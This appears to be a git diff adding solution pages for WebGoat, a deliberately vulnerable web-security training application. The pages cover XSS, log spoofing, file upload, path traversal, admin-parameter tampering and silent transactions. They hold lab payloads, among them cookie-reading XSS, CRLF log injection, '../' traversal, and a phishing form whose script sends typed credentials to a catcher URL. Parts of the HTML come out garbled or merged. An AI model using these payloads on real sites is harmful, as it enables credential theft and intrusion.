+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/Lab XSS/Lab Block Reflected XSS.html
@@ -0,0 +1,32 @@
+
+
+
+Solution Lab Block Stored XSS
+Lesson Plan Title: How to Perform Cross Site Scripting (XSS)
+
+Concept / Topic To Teach:
+
+General Goal(s):
+
+Solution:
+String regex = "[\\s\\w-,]*";
+String parameter = s.getParser().getRawParameter(name);
+Pattern pattern = Pattern.compile(regex);
+validate(parameter, pattern);
+
+return parameter;
+Solution Lab Block Stored XSS
+Lesson Plan Title: How to Perform Cross Site Scripting (XSS)
+
+Concept / Topic To Teach:
+
+General Goal(s):
+
+Solution:
+
+
+/**Your code**/
+
+
+This validation allows following:
+
+Use of any other character will throw a Validation Exception.
+
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/Lab XSS/Lab Block Stored XSS using Output Encoding.html b/webgoat-5.4/src/main/webapp/lesson_solutions/Lab XSS/Lab Block Stored XSS using Output Encoding.html
new file mode 100644
index 000000000..52a4b3283
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/Lab XSS/Lab Block Stored XSS using Output Encoding.html
@@ -0,0 +1,26 @@
+
+
+
+Solution Lab Block Stored XSS
+Lesson Plan Title: How to Perform Cross Site Scripting (XSS)
+
+Concept / Topic To Teach:
+
+General Goal(s):
+
+Solution:
This method changes all special characters in the string. Now you have to use this method in the getEmployeeProfile method in the org.owasp.webgoat.lessons.CrossSiteScripting.ViewProfile class.
+Replace all answer_results.getString(someString) with HtmlEncoder.encode(answer_results.getString(someString)) and you are done.
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/Lab XSS/Lab Reflected XSS.html b/webgoat-5.4/src/main/webapp/lesson_solutions/Lab XSS/Lab Reflected XSS.html
new file mode 100644
index 000000000..e53bc0e3c
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/Lab XSS/Lab Reflected XSS.html
@@ -0,0 +1,27 @@
+
+
+
+Solution Lab Block Stored XSS
+Lesson Plan Title: How to Perform Cross Site Scripting (XSS)
+
+Concept / Topic To Teach:
+
+General Goal(s):
+
+Solution: <script>alert("Dangerous");</script>. Now hit
+the 'FindProfile' Button and you are done.
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/Lab XSS/Lab Stored XSS Revisited.html b/webgoat-5.4/src/main/webapp/lesson_solutions/Lab XSS/Lab Stored XSS Revisited.html
new file mode 100644
index 000000000..50f976cc4
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/Lab XSS/Lab Stored XSS Revisited.html
@@ -0,0 +1,27 @@
+
+
+
+Solution Lab Block Stored XSS
+Lesson Plan Title: How to Perform Cross Site Scripting (XSS)
+
+Concept / Topic To Teach:
+
+General Goal(s):
+
+Solution:
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/Lab XSS/Lab Stored XSS.html b/webgoat-5.4/src/main/webapp/lesson_solutions/Lab XSS/Lab Stored XSS.html
new file mode 100644
index 000000000..a57dc020a
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/Lab XSS/Lab Stored XSS.html
@@ -0,0 +1,36 @@
+
+
+
+Solution Lab Block Stored XSS
+Lesson Plan Title: How to Perform Cross Site Scripting (XSS)
+
+Concept / Topic To Teach:
+
+General Goal(s):
+
+Solution:
+
+
+
+Now log in as Jerry with jerry as password. Select from the the list the profile of tom and hit the
+ViewProfile Button. Congratulation! You have completed the lesson.
+
+
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/Lab XSS/images/stored_xss.png b/webgoat-5.4/src/main/webapp/lesson_solutions/Lab XSS/images/stored_xss.png
new file mode 100644
index 000000000..83aa7983e
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/Lab XSS/images/stored_xss.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/LogSpoofing.html b/webgoat-5.4/src/main/webapp/lesson_solutions/LogSpoofing.html
new file mode 100644
index 000000000..c1538709d
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/LogSpoofing.html
@@ -0,0 +1,793 @@
+
+
+
+
+
+
Lesson
+Plan Title: How to
+Perform Log Spoofing.
+
+
+
+
Concept /
+Topic To Teach:
+
+
This lesson
+teaches attempts to fool the human eye.
+
+
+
+
How the
+attacks works: The attack
+is based on fooling the human eye in log files. An attacker can erase his
+traces from the logs using this attack.
+
+
+
+
General
+Goal(s):
+
+
The
+grey area below represents what is going to be logged in the web server's log
+file.
+
+
+
+
+
+
Figure 1 Log Spoofing
+
+
+
+
Solution:
+
+
+
+
This lesson accepts any input for a username and appends the information
+to the log file.
+
+
+
+
Enter for username the text: smith Login Succeeded for username admin
+
+
+
+
+
+
Figure 2 Log spoof with long text
+
+
+
+
The text is added to the same line, not a new line. But any input is
+allowed.
+
+
In this way you can inject carriage return (%0d) and line feed (%0a) to
+the application.
+
+
+
+
Fill out the following text for the username: Smith%0d%0aLogin Succeeded
+for username: admin
+
+
+
+
+
+
Figure 3 Lesson completed
+
+
+
+
An attacker
+can use this attack to add malicious JavaScript to the log file, which will be
+viewed by the administrator using a browser. What happens when you inject admin
+<script>alert(document.cookie)</script> for the username?
+
+
+
+
+
+
+ Solution by Erwin Geirnaert
+
+
+
+
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/LogSpoofing_files/Thumbs.db b/webgoat-5.4/src/main/webapp/lesson_solutions/LogSpoofing_files/Thumbs.db
new file mode 100644
index 000000000..c8864bbfb
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/LogSpoofing_files/Thumbs.db differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/LogSpoofing_files/colorschememapping.xml b/webgoat-5.4/src/main/webapp/lesson_solutions/LogSpoofing_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/LogSpoofing_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/LogSpoofing_files/image001.png b/webgoat-5.4/src/main/webapp/lesson_solutions/LogSpoofing_files/image001.png
new file mode 100644
index 000000000..59ffaca93
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/LogSpoofing_files/image001.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/LogSpoofing_files/image003.png b/webgoat-5.4/src/main/webapp/lesson_solutions/LogSpoofing_files/image003.png
new file mode 100644
index 000000000..100684c5f
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/LogSpoofing_files/image003.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/LogSpoofing_files/image005.png b/webgoat-5.4/src/main/webapp/lesson_solutions/LogSpoofing_files/image005.png
new file mode 100644
index 000000000..0174b03b0
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/LogSpoofing_files/image005.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/LogSpoofing_files/image007.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/LogSpoofing_files/image007.jpg
new file mode 100644
index 000000000..50abf182f
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/LogSpoofing_files/image007.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/LogSpoofing_files/image008.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/LogSpoofing_files/image008.jpg
new file mode 100644
index 000000000..afd0c3eb3
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/LogSpoofing_files/image008.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/LogSpoofing_files/image009.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/LogSpoofing_files/image009.jpg
new file mode 100644
index 000000000..259e28f16
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/LogSpoofing_files/image009.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/LogSpoofing_files/themedata.thmx b/webgoat-5.4/src/main/webapp/lesson_solutions/LogSpoofing_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/LogSpoofing_files/themedata.thmx differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/MaliciousFileExecution.html b/webgoat-5.4/src/main/webapp/lesson_solutions/MaliciousFileExecution.html
new file mode 100644
index 000000000..0a4e0b348
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/MaliciousFileExecution.html
@@ -0,0 +1,46 @@
+
+
+
+Solution: Malicious File Execution
+Lesson Plan Title: Malicious File Execution
+
+Concept / Topic To Teach:
+
+General Goal(s):
+
+Solution: guest.txt in the directory provided in the lesson (the path is generated based on your system).filepath \\guest.txt");
+file.createNewFile();
+%>
+</HTML><% indicates that the upcoming code is a java servlet, so java code is allowed. Make sure you fill in the filepath correctly - each directory must be separated by \\ , not \ . The filename of the .jsp doesn't matter, as long as you know what it is.Viewing properties of the uploaded image in Firefox. File path for the uploaded image (and our .jsp) in Firefox. http://localhost/WebGoat/uploads/image.jpg .http://localhost/WebGoat/uploads/yourfile.jsp .Multi Level Login 1
+Lesson Plan Title: Multi Level Login 1
+
+Concept / Topic To Teach:
+
+General Goal(s):
+
+Solution:
+Stage 1
+
+Figure 1: Login Screen
+
+Figure 2: TAN Screen
+
+Stage 2
+
+Figure 3: Manipulation Of The Hidden Field With WebScarab
+
+Figure 4: Manipulation Of The Hidden Field With WebScarab
+ Multi Level Login 2
+Lesson Plan Title: Multi Level Login 2
+
+Concept / Topic To Teach:
+
+General Goal(s):
+
+Solution:
+
+
Figure 1: Manipulation Of The Hidden Field With WebScarab
+
Solution: Modify Data with SQL
+Lesson Plan Title: Off By One Buffer Overflows
+
+This new lesson does not yet have a detailed solution. If you would like to provide a solution for this lesson, please send an e-mail to WebGoat@owasp.org .
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/PasswordStrength.html b/webgoat-5.4/src/main/webapp/lesson_solutions/PasswordStrength.html
new file mode 100644
index 000000000..2a587e50b
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/PasswordStrength.html
@@ -0,0 +1,38 @@
+
+
+
+password Strength
+Lesson Plan Title: Password Strength
+
+Concept / Topic To Teach:
+
+Accounts are only as secure as there passwords. Most users have the same weak password everywhere. If you want to protect them against brute-force-attacks your application should have good requirements for passwords. The password should contain lower case letters, capitals and numbers. The longer the password, the better.
+
+General Goal(s):
+ For this exercise, your job is to test several passwords on https://www.cnlab.ch/codecheck .
+Solution: https://www.cnlab.ch/codecheck . Copy the first password in the field and click "Run the check".Code checker Pop-up The result 0 seconds1394 seconds5 hours2 days41 days
+
+
Lesson Plan Title: How to Bypass a Path Based Access
+Control Scheme
+
+
Concept / Topic To Teach: In a path based access control scheme,
+an attacker can traverse a path by providing relative path information.
+Therefore an attacker can use relative paths to access files that normally are
+not directly accessible by anyone, or would otherwise be denied if requested
+directly.
+
+
General Goal(s): The user should be able to
+access a file that is not in the listed directory.
+
+
+
+
Figure 1 Lesson 8
+
+
+
+
Solution:
+
+
+
+
This lesson
+can be solved by intercepting the filename in WebScarab and replacing it with
+../main.jsp which is a file located in a folder below the current directory.
+
+
+
+
+
+
Figure 2 Change the variable File
+
+
+
+
+
+
Figure 3 Lessen 8 Completed
+
+
+
+
+
+
+
+
+ Solution by Erwin Geirnaert
+
+
+
+
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/colorschememapping.xml b/webgoat-5.4/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image001.png b/webgoat-5.4/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image001.png
new file mode 100644
index 000000000..089968f01
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image001.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image002.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image002.jpg
new file mode 100644
index 000000000..4d4b17604
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image002.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image003.png b/webgoat-5.4/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image003.png
new file mode 100644
index 000000000..0bc317162
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image003.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image004.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image004.jpg
new file mode 100644
index 000000000..7978fe44b
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image004.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image005.png b/webgoat-5.4/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image005.png
new file mode 100644
index 000000000..4f0de1d74
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image005.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image006.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image006.jpg
new file mode 100644
index 000000000..4d4491eb3
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image006.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/themedata.thmx b/webgoat-5.4/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/themedata.thmx differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/Phishing.html b/webgoat-5.4/src/main/webapp/lesson_solutions/Phishing.html
new file mode 100644
index 000000000..ac817a401
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/Phishing.html
@@ -0,0 +1,69 @@
+
+
+Phising with XSS
+Lesson Plan Title: Phishing with XSS
+
+Concept / Topic To Teach:
+
+General Goal(s):
+
+Solution:
+A form the victim has to fill in
+A script which reads the form and sends the gathered information to the attacker
+
+A Form with username and password could look like this:
+</form><form name="phish"><br><br><HR><H3>This feature requires account login:</H3
+><br><br>Enter Username:<br><input type="text" name="user"><br>Enter Password:<br><input type="password"
+name = "pass"><br></form><br><br><HR>
+
+Now you need a script:
+
+<script>function hack(){ XSSImage=new Image; XSSImage.src="http://localhost/WebGoat/ catcher?PROPERTY=yes&user="+
+document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Had this been a real attack... Your credentials were just stolen.
+User Name = " + document.phish.user.value + "Password = " + document.phish.pass.value);}
+</script>
+
+
+This script will read the input from the form and send it to the catcher of WebGoat.in blue should match what is in your address bar. If you are using ports and/or webscarab, it may be different.
+
+<input type="submit" name="login" value="login" onclick="hack()">
+
+The final String looks like this:http://localhost/WebGoat/ catcher?PROPERTY=yes&user="+
+document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Had this been a real attack... Your credentials were just stolen.
+User Name = " + document.phish.user.value + "Password = " + document.phish.pass.value);}
+</script><form name="phish"><br><br><HR><H3>This feature requires account login:</H3
+><br><br>Enter Username:<br><input type="text" name="user"><br>Enter Password:<br><input type="password"
+name = "pass"><br><input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR>
+
+Search for this String and you will see a form asking for your username and password.
+Fill in these fields and click on the Login Button, which completes the lesson.New login field after submitting the script.
+
+
Lesson Plan Title: How to Perform Reflected Cross Site
+Scripting (XSS) Attacks
+
+
Concept / Topic To Teach: It is always a good practice to validate
+all input on the server side. XSS can occur when unvalidated user input is used
+in an HTTP response. In a reflected XSS attack, an attacker can craft a URL
+with the attack script and post it to another website, email it, or otherwise
+get a victim to click on it.
+
+
General Goal(s): For this exercise, your
+mission is to come up with some input containing a script. You have to try to
+get this page to reflect that input back to your browser, which will execute
+the script and do something bad.
+
+
+
+
Figure 1 Lesson 15
+
+
+
+
Solution:
+
+
+
+
Enter
+<script>alert('Bang!')</script> for the PIN value
+
+
+
+
+
+
Figure 2 Lesson 15 Completed
+
+
+
+
+
+
+
+
+
+
+ Solution by Erwin Geirnaert
+
+
+
+
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ReflectedXSS_files/colorschememapping.xml b/webgoat-5.4/src/main/webapp/lesson_solutions/ReflectedXSS_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/ReflectedXSS_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ReflectedXSS_files/image001.png b/webgoat-5.4/src/main/webapp/lesson_solutions/ReflectedXSS_files/image001.png
new file mode 100644
index 000000000..6ff72a45b
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ReflectedXSS_files/image001.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ReflectedXSS_files/image003.png b/webgoat-5.4/src/main/webapp/lesson_solutions/ReflectedXSS_files/image003.png
new file mode 100644
index 000000000..e44f2e566
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ReflectedXSS_files/image003.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ReflectedXSS_files/image005.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/ReflectedXSS_files/image005.jpg
new file mode 100644
index 000000000..73cdb0bbf
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ReflectedXSS_files/image005.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ReflectedXSS_files/image006.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/ReflectedXSS_files/image006.jpg
new file mode 100644
index 000000000..fb2e1977e
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ReflectedXSS_files/image006.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ReflectedXSS_files/themedata.thmx b/webgoat-5.4/src/main/webapp/lesson_solutions/ReflectedXSS_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ReflectedXSS_files/themedata.thmx differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/RemoteAdminFlaw.html b/webgoat-5.4/src/main/webapp/lesson_solutions/RemoteAdminFlaw.html
new file mode 100644
index 000000000..b154b0c40
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/RemoteAdminFlaw.html
@@ -0,0 +1,666 @@
+
+
+
+
+
+
Lesson
+Plan Title: Remote
+Admin Access
+
+
+
+
Concept /
+Topic To Teach:
+
+
Applications
+will often have an administrative interface that allows privileged users access
+to functionality that normal users shouldn't see. The application server will
+often have an admin interface as well.
+
+
+
+
General
+Goal(s):
+
+
Try to access
+the administrative interface for WebGoat. You may also try to access the
+administrative interface for Tomcat. The Tomcat admin interface can be accessed
+via a URL (/admin) and will not count towards the completion of this lesson.
+
+
+
+
+
+
Figure 1 Lesson 7
+
+
+
+
Solution:
+
+
+
+
Append &admin=true to the URL in the
+browser and hit "Enter"
+
+
+
+
Open the menu
+"Admin functions" and notice that you have additional menu options like
+"Database Dump", "User Information" and "Product Information".
+
+
+
+
+
+
Figure 2 Some extra admin functions
+
+
+
+
Clicking on
+"User Information" will not work. This is because the URL behind "User
+Information" is http://localhostattack?Screen=71&menu=10
+does not contain the parameter admin=true. Rewrite the URL to become http://localhostattack?Screen=71&menu=10&admin=true
+
+
+
+
Remark: the parameter Screen is generated
+randomly and can be different in your environment!
+
+
+
+
+
+
Figure 3 Lesson 7 Completed
+
+
+
+
+
+
+ Solution by Erwin Geirnaert
+
+
+
+
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/colorschememapping.xml b/webgoat-5.4/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image001.png b/webgoat-5.4/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image001.png
new file mode 100644
index 000000000..eb4392c2d
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image001.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image002.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image002.jpg
new file mode 100644
index 000000000..6301ccbb1
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image002.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image003.png b/webgoat-5.4/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image003.png
new file mode 100644
index 000000000..b6bf2f272
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image003.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image004.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image004.jpg
new file mode 100644
index 000000000..d94ac96c1
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image004.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image005.png b/webgoat-5.4/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image005.png
new file mode 100644
index 000000000..4a274e847
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image005.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image006.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image006.jpg
new file mode 100644
index 000000000..b93cbad84
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image006.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/themedata.thmx b/webgoat-5.4/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/themedata.thmx differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SameOriginPolicyProtection.html b/webgoat-5.4/src/main/webapp/lesson_solutions/SameOriginPolicyProtection.html
new file mode 100644
index 000000000..59fac9fa5
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/SameOriginPolicyProtection.html
@@ -0,0 +1,641 @@
+
+
+
+Solution: Same Origin Policy Protection
+
+
+
+
+
+
+
+
+
+
+
+
Lesson
+Plan Title: Same Origin Policy Protection.
+
+
+
+
Concept /
+Topic To Teach:
+
+
A key element of AJAX is the XMLHttpRequest (XHR), which allows javascript to make asynchronous calls from the client side to a server. However, as a security measure these requests may only be made to the server from which the client page originated.
+
+
+
+
General
+Goal(s):
+
+
+
+
This exercise demonstrates the Same Origin Policy Protection. XHR requests can only be passed back to the originating server. Attempts to pass data to a non-originating server will fail.
+
+
+
Solution:
+
+
Click both of the links on the page to see their behavior and complete the lesson.
+
+
+
+
+
+
+
Session Fixation
+Lesson Plan Title: Session Fixation
+
+Concept / Topic To Teach:
+
+How the attacks works:
+An attacker can send a hyperlink to a
+ victim with a chosen Session ID. This can be
+ done for example by a prepared mail which looks like an
+official mail from the application administrator. If the victim
+ clicks on the link and logs in he is authorized by the
+ Session ID the attacker has chosen. The attacker can visit
+ the page with the same ID and is recognized as the victim
+ and gets logged in without authorization.
+
+General Goal(s):
+
+
+Solution:
+Stage 1:
+
+Figure 1: Prepared Mail
+
+
+Stage 2:
+
+Figure 2: Received Mail
+
+
+Stage 3:
+
+Figure 3: Goat Hills Financial Login Screen
+
+
+Stage 4:
+
+Figure 4: Browser Address Bar Before Changes
+Figure 5: Browser Address Bar After Changes
+
+
+Figure 6: Successful Completion Of The Lesson
+
+
Solution: Silent Transcations Attacks
+
+
+
Lesson
+Plan Title: How to
+Perform Silent Transactions Attacks.
+
+
+
+
Concept /
+Topic To Teach:
+
+
This lesson
+teaches how to perform silent transactions attacks.
+
+
+
+
How the
+attacks works:
+
+
Any system that
+silently processes transactions using a single submission is dangerous to the
+client. For example, if a normal web application allows a simple URL
+submission, a preset session attack will allow the attacker to complete a
+transaction without the user's authorization. In Ajax, it gets worse: the
+transaction is silent; it happens with no user feedback on the page, so an
+injected attack script may be able to steal money from the client without
+authorization.
+
+
+
+
General
+Goal(s):
+
+
This is a
+sample internet banking application - money transfer page.
+
+
It shows
+below your balance, the account you are transferring to and amount you will
+transfer.
+
+
+
+
Figure 1 AJAX Security - Silent transaction attacks
+
+
+
+
Solution:
+
+
This web
+application uses JavaScript on the client to initiate a transaction for
+transferring money. Examining the HTML source reveals that two JavaScript
+functions are being used:
+
+
+
<script>
+
+
function
+processData(){
+
+
var accountNo =
+document.getElementById('newAccount').value;
+
+
var amount =
+document.getElementById('amount').value;
+
+
if ( accountNo == ''){
+
+
alert('Please enter a valid account number to
+transfer to.')
+
+
return;
+
+
}
+
+
else if ( amount == ''){
+
+
alert('Please enter a valid amount to
+transfer.')
+
+
return;
+
+
}
+
+
var balanceValue =
+document.getElementById('balanceID').innerText;
+
+
balanceValue = balanceValue.replace( new
+RegExp('$') , '');
+
+
if ( parseFloat(amount) >
+parseFloat(balanceValue) ) {
+
+
alert('You can not transfer more funds than
+what is available in your balance.')
+
+
return;
+
+
}
+
+
document.getElementById('confirm').value = 'Transferring'
+
+
submitData(accountNo,
+amount);
+
+
document.getElementById('confirm').value = 'Confirm'
+
+
balanceValue
+= parseFloat(balanceValue) - parseFloat(amount);
+
+
balanceValue
+= balanceValue.toFixed(2);
+
+
document.getElementById('balanceID').innerText
+= balanceValue + '$';
+
+
}
+
+
function
+submitData(accountNo, balance) {
+
+
var url =
+'attack?Screen=74&menu=1150&from=ajax&newAccount='+
+accountNo+ '&amount=' + balance +'&confirm=' +
+document.getElementById('confirm').value;
+
+
if (typeof
+XMLHttpRequest != 'undefined') {
+
+
req = new
+XMLHttpRequest();
+
+
} else if
+(window.ActiveXObject) {
+
+
req = new
+ActiveXObject('Microsoft.XMLHTTP');
+
+
}
+
+
req.open('GET', url, true);
+
+
req.onreadystatechange = callback;
+
+
req.send(null);
+
+
}
+
+
function
+callback() {
+
+
if (req.readyState == 4) {
+
+
if (req.status == 200) {
+
+
var result = req.responseText ;
+
+
var resultsDiv =
+document.getElementById('resultsDiv');
+
+
resultsDiv.innerHTML = '';
+
+
resultsDiv.innerHTML
+= result;
+
+
}}}
+
+
</script>
+
+
+
The function
+processData() is called when the user fills out an account number and an amount
+to transfer. The function processData() will check if the user has sufficient
+balance before initiating the transaction. After validation of the balance, the
+JavaScript function submitData(accountNo, balance) is called which actually
+submits the required information, target account number and the amount to
+transfer, to the back-end web application.
+
+
+
+
If you are
+able to call this JavaScript function submitData(accountNo, balance) from the
+browser, you are able to bypass the client-side validation and execute this
+transaction silently, without an additional approval or digital signature of
+the user.
+
+
+
+
The latest
+generation of browsers allows to call JavaScript from the address bar, using
+javascript:function();. Try to execute: javascript:submitData(1234556,11000);
+
+
+
+
+
+
Figure 2 Follow the hints....
+
+
+
+
+
+
Figure 3 HTTP Request generated from Javascript function
+submitData(123456,110000);
+
+
+
+
+
+
+
+
Figure 4 Lesson completed
+
+
+
+
+
+
+ Solution by Erwin Geirnaert
+
+
+
+
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SilentTransactions_files/colorschememapping.xml b/webgoat-5.4/src/main/webapp/lesson_solutions/SilentTransactions_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/SilentTransactions_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SilentTransactions_files/image001.png b/webgoat-5.4/src/main/webapp/lesson_solutions/SilentTransactions_files/image001.png
new file mode 100644
index 000000000..61f7e63a1
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/SilentTransactions_files/image001.png differ
